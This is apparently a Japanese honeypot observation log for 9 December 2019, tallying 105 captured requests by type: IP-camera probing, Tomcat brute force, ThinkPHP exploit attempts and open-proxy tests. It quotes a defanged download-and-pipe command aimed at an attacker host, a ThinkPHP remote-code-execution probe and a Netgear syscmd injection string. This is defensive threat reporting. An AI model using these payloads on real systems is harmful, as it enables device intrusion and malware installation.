WOWHoneypot観察(268日目)
2019/12/09(月)
トータルは105件でした。
ハンティングログは以下です。
167.249.245[.]44 wget${IFS}-qO-${IFS}hxxp[:]//205.185.115[.]72/b |
件数 | 概要 | リクエスト |
---|---|---|
33 | アクセス | GET / |
4 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
2 | IPカメラの調査 | GET /webcapture.jpg?command=snap&channel=1?COUNTER |
2 | IPカメラの調査 | GET /videostream.cgi?user=admin&pwd= |
2 | IPカメラの調査 | GET /video/mjpg.cgi |
2 | IPカメラの調査 | GET /snap.jpg?JpegSize=M&JpegCam=1&r=COUNTER |
2 | IPカメラの調査 | GET /shot.jpg?rnd=654321 |
2 | IPカメラの調査 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
2 | IPカメラの調査 | GET /out.jpg?q=30&id=0.1317044913727916&r=COUNTER |
2 | IPカメラの調査 | GET /oneshotimage1?COUNTER |
2 | IPカメラの調査 | GET /mjpg/video.mjpg |
2 | IPカメラの調査 | GET /mjpeg.cgi |
2 | IPカメラの調査 | GET /manager/text/list |
2 | IPカメラの調査 | GET /live.jpg?&&&COUNTER |
2 | IPカメラの調査 | GET /jpg/image.jpg?COUNTER |
2 | IPカメラの調査 | GET /img/video.mjpeg |
2 | IPカメラの調査 | GET /image?speed=0 |
2 | IPカメラの調査 | GET /cgi-bin/viewer/video.jpg?r=COUNTER |
2 | IPカメラの調査 | GET /cgi-bin/snapshot.cgi?chn=3&u=admin&p=&q=0&COUNTER |
2 | IPカメラの調査 | GET /cgi-bin/snapshot.cgi?chn=2&u=admin&p=&q=0&COUNTER |
2 | IPカメラの調査 | GET /cgi-bin/snapshot.cgi?chn=1&u=admin&p=&q=0&COUNTER |
2 | IPカメラの調査 | GET /cgi-bin/snapshot.cgi?chn=0&u=admin&p=&q=0&COUNTER |
2 | IPカメラの調査 | GET /cgi-bin/faststream.jpg?stream=half&fps=15&rand=COUNTER |
2 | IPカメラの調査 | GET /cgi-bin/camera?resolution=640&quality=1&Language=0&COUNTER |
2 | IPカメラの調査 | GET /cam_1.cgi |
2 | IPカメラの調査 | GET /axis-cgi/mjpg/video.cgi?camera=&resolution=640x480 |
2 | IPカメラの調査 | GET /SnapshotJPEG?Resolution=640x480&Quality=Clarity&COUNTER |
2 | IPカメラの調査 | GET /GetData.cgi?CH=1 |
2 | IPカメラの調査 | GET /?action=stream |
2 | IPカメラの調査 | GET /-wvhttp-01-/GetOneShot?image_size=640x480&frame_count=1000000000 |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | 不明 | HEAD /esps/ |
1 | クローリング | GET /robots.txt |
1 | 不明 | GET /dd/ |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | 管理者設定の調査 | GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin |
1 | 管理者設定の調査 | GET //admin/config.php?password%5B0%5D=ZIZO&username=admin |
1 | 不正中継の試み | CONNECT www.google.com:443 |